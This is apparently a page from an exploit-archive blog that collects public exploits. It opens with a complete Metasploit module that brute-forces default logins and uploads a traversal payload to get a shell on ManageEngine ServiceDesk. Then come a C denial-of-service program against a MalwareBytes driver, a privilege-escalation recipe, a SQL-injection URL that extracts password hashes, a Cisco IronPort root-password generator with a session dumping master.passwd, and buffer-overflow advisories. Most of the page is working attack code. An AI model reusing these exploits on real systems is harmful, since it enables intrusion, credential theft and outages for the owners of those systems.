##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
been tested successfully in Windows and Linux on several versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', { } ],
[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
{
'attachment_path' => '/workorder/Attachment.jsp'
}
],
[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
],
[ 'IT360 v8-v10.4',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2014'))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSESSIONID',
[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
OptString.new('IAMAGENTTICKET',
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME',
[true, 'The username to login as', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
version = [ 9999, 9999, 0, 'sd' ]
if res && res.code == 200
if res.body.to_s =~ /ManageEngine ServiceDesk/
if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
output = $1
version = [output[0].to_i, output[2].to_i, '0', 'sd']
end
if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
version[2] = $1.to_i
elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine AssetExplorer/
if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
output = $1
version = [output[0].to_i, output[2].to_i, 0, 'ae']
end
if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
version[3] = 'sc'
if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
# ... but get the build number if we can find it
version[2] = $1.to_i
end
elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
# IT360 newer versions
version[3] = 'it'
end
elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
# IT360 older versions, not a very good detection string but there is no alternative?
version[3] = 'it'
end
version
end
def check
version = get_version
# TODO: put fixed version on the two ifs below once (if...) products are fixed
# sd was fixed on build 9031
# ae and sc still not fixed
if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
(version[3] == 'sc' && version[2] < 99999)
return Exploit::CheckCode::Appears
end
if (version[2] > 9030 && version[3] == 'sd') ||
(version[2] > 99999 && version[3] == 'ae') ||
(version[2] > 99999 && version[3] == 'sc')
return Exploit::CheckCode::Safe
else
# An IT360 check always lands here, there is no way to get the version easily
return Exploit::CheckCode::Unknown
end
end
def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'false'
}
else
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
}
end
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
'service' => 'ServiceDesk',
'furl' => '/',
'timestamp' => Time.now.to_i
},
'vars_post' => vars_post
})
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
else
return nil
end
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/")
})
cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
return nil
end
end
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.redirect?
uri = [ res.redirection.port, res.redirection.path ]
else
return nil
end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
if cookie != nil
return cookie
else
# Try one more time with the default admin login for some versions
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
if cookie != nil
return cookie
end
end
end
nil
end
#
# Authenticate and validate our session cookie. We need to submit credentials to
# j_security_check and then follow the redirect to HomePage.do to create a valid
# authenticated session.
#
def authenticate(cookie, username, password)
res = send_request_cgi!({
'method' => 'POST',
'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => {
'j_username' => username,
'j_password' => password,
'logonDomainName' => datastore['DOMAIN_NAME']
}
})
if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
# sd and ae respond with 302 while sc responds with a 200
return true
else
return false
end
end
def login
# Do we already have a valid cookie? If yes, just return that.
if datastore['JSESSIONID'] != nil
cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
return cookie
end
# First we get a valid JSESSIONID to pass to authenticate()
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.code == 200
cookie = res.get_cookies
authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
if authenticated
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
authenticated = authenticate(cookie, 'administrator', 'administrator')
if authenticated
return cookie
else
# Try one more time with the default admin login for some versions
authenticated = authenticate(cookie, 'admin', 'admin')
if authenticated
return cookie
end
end
end
end
nil
end
def send_multipart_request(cookie, payload_name, payload_str)
if payload_name =~ /\.ear/
upload_path = '../../server/default/deploy'
else
upload_path = rand_text_alpha(4+rand(4))
end
post_data = Rex::MIME::Message.new
if @my_target == targets[1]
# old style
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
else
post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
end
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(@my_target['attachment_path']),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie
})
return res
end
def pick_target
return target if target.name != 'Automatic'
version = get_version
if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
(version[0] == 4 && version[3] == 'ae') ||
(version[3] == 'sc')
# These are all "old style" versions (sc is always old style)
return targets[1]
elsif version[3] == 'it'
return targets[3]
else
return targets[2]
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}")
if @my_target == targets[3]
cookie = login_it360
else
cookie = login
end
if cookie.nil?
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
app_xml << '<application>'
app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + '.war', war_payload.to_s)
ear_file.add_file('META-INF/application.xml', app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
if @my_target != targets[3]
# Linux doesn't like it when we traverse non existing directories,
# so let's create them by sending some random data before the EAR.
# (IT360 does not have a Linux version so we skip the bogus file for it)
print_status("#{peer} - Uploading bogus file...")
res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
if res && res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
end
end
# Now send the actual payload
print_status("#{peer} - Uploading EAR file...")
res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful")
else
fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi({
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863583452
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date - 19th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.malwarebytes.org
Tested Version - 1.03.1.1220, 1.04.1.1012
Driver Version - no version set - mbae.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/114249
CVE ID - CVE-2014-100039
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 25
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE sizebytes[4] = "\xff\xff\xff\x00";
BYTE *inbuffer;
printf("-------------------------------------------------------------------------------\n");
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, BUFSIZE);
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to DoS . . .");
getch();
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoS buffer sent\n\n");
CloseHandle(hDevice);
return 0;
}
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8
#Privilege Escalation in RedaxScript 2.1.0
RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
issue occurs because the application fails to properly implement access
controls. The application also fails to perform proper sanity checks on the
user supplied input before processing it. These two flaws led to a
vertical privilege escalation. This can be achieved by a simply tampering
the parameter values. An attacker can exploit this issue to gain elevated
privileges to the application.
*Steps to reproduce the instance:*
· login as a non admin user
· Go to account and update the account.
· intercept the request and add “*groups[]=1*” to the post data and
submit the request
· Log out of the application and log in again. You can now browse
the application with admin privileges.
This vulnerability was addressed in the following commit.
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
*Timeline*:
09-26-2014: Issue identified
09-27-2014: Discussion with the vendor
10-27-2014: Issue confirmed
11-05-2014: Patch released.
Author: Shyamkumar Somana
Vendor Homepage: http://redaxscript.com/download
Version: 2.1.0
Tested on: Windows 7
--
[image: --]
shyam kumar
[image: http://]about.me/shyamkumar.somana
<http://about.me/shyamkumar.somana?promo=email_sig>
Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |
source: https://www.securityfocus.com/bid/48223/info
Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
/*
Cisco Ironport Appliances Privilege Escalation Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.5.5-280
Cisco Ironport WSA - AsyncOS 8.0.5-075
Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure
Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation.
By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations.
The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.
Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account.
[SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password.
[GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access.
[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528
Technical Details:
By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access.
This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service.
Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance.
Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.
PoC:
Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"
#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"
void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);
int main(int argc, char *argv[]) {
if (argc < 2) { usage(argv[0]); }
int opt;
int index;
char *temp_pass = { 0 };
char *serial_no = { 0 };
char *secret_pass = SECRET_PASS;
char service[MAX_BUFFER] = { 0 };
unsigned char digest[16] = { 0 };
while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
switch (opt)
{
case 'p':
temp_pass = optarg;
break;
case 's':
serial_no = optarg;
break;
case 'h': usage(argv[0]);
break;
default:
printf_s("Wrong Argument: %s\n", argv[1]);
break;
}
}
for (index = optind; index < argc; index++) {
usage(argv[0]);
exit(0);
}
if (temp_pass == NULL || serial_no == NULL) {
usage(argv[0]);
exit(0);
}
if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
to_lower(serial_no);
fuzz_string(temp_pass);
strcpy_s(service, sizeof(service), temp_pass);
strcat_s(service, sizeof(service), serial_no);
strcat_s(service, sizeof(service), secret_pass);
MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, service, strlen(service));
MD5_Final(digest, &context);
printf_s("Service Password: ");
for (int i = 0; i < sizeof(digest)-12; i++)
printf("%02x", digest[i]);
}
return 0;
}
void fuzz_string(char *str) {
while (*str){
switch (*str) {
case '1': *str = 'i'; break;
case '0': *str = 'o'; break;
case '_': *str = '-'; break;
}
str++;
}
}
void to_lower(char *str) {
while (*str) {
if (*str >= 'A' && *str <= 'Z') {
*str += 0x20;
}
str++;
}
}
void usage(char *name) {
printf_s("\nUsage: %s -p password -s serial\n", name);
printf_s(" -p <password> | Cisco Service Temp Password\n");
printf_s(" -s <serial> | Cisco Serial Number\n");
printf_s(" -h | This Help Menu\n");
printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
exit(0);
}
source: https://www.securityfocus.com/bid/48464/info
Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability.
Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip
#######################################################################
Luigi Auriemma
Application: Sybase Advantage Server
http://www.sybase.com/products/databasemanagement/advantagedatabaseserver
Versions: <= 10.0.0.3
Platforms: Windows, NetWare, Linux
Bug: off-by-one
Exploitation: remote, versus server
Date: 27 Jun 2011 (found 29 Oct 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"Advantage Database Server is a full-featured, easily embedded,
client-server, relational database management system that provides you
with Indexed Sequential Access Method (ISAM) table-based and SQL-based
data access."
#######################################################################
======
2) Bug
======
By default the Advantage server (ADS process) listens on the UDP and
TCP ports 6262 and optionally is possible to specify also a so called
"internet port" for non-LAN connections.
The problem is enough unusual and affects the code that handles a
certain type of packets on the UDP port.
In short the server does the following:
- it uses memcpy to copy the data from the packet into a stack buffer
of exactly 0x2b8 bytes (handled as 0x2b9 bytes)
- later this data is handled as a string but no final NULL byte
delimiter is inserted
- there is also an off-by-one bug since one byte overwrites the lower
8bit value of a saved element (a stack pointer 017bff??)
- after this buffer are located some pushed elements and obviously the
return address of the function
- it calls the OemToChar API that changes some bytes of the buffer
(like those major than 0x7f) till it reaches a 0x00 that "luckily" is
after the return address
- so also the return address gets modified, exactly from 0084cb18 to
00e42d18 that ironically is a valid stack frame somewhat related to
the starting of the service
- the data inside this stack address doesn't seems changeable from
outside and has tons of 0x00 bytes that in this case act like NOPs
till the zone around 00ebf05b where are located some pushed elements
- the EBX register contains two bytes of the attacker's data and EBP
points to such data
the following is a resume of these operations:
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa�{
017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .�&�q��{..˄....
|---------|
original return address
0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>]
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa�{
017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .�&-q+�{..-�....
|---------|
new return address
00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
...
00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .�x�|J��| ...���
00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .���.....h��....
00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\��.�.�w���....
00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...�.�w.��...
00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|..
00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u.........
00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......�.......
the code flow usually arrives till 00ebf0ab or other addresses close
to it depending by the data saved there when the service started.
Now for exploiting this vulnerability would be required the presence of
a "jmp ebp" or "call ebp" or a sequence of instructions with a similar
result in the 00ebf05b zone which looks like an enough rare event.
I have not tested the Linux and NetWare platforms so I don't know if
the problem exists also there and if there are more chances of
exploiting it.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/ads_crc.zip
udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592
#######################################################################
======
4) Fix
======
No fix.
UPDATE:
vendor has fixed the bug in version 10.10.0.16 released in July 2011:
http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff
#######################################################################
source: https://www.securityfocus.com/bid/48462/info
Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.
Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip
source: https://www.securityfocus.com/bid/48455/info
Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
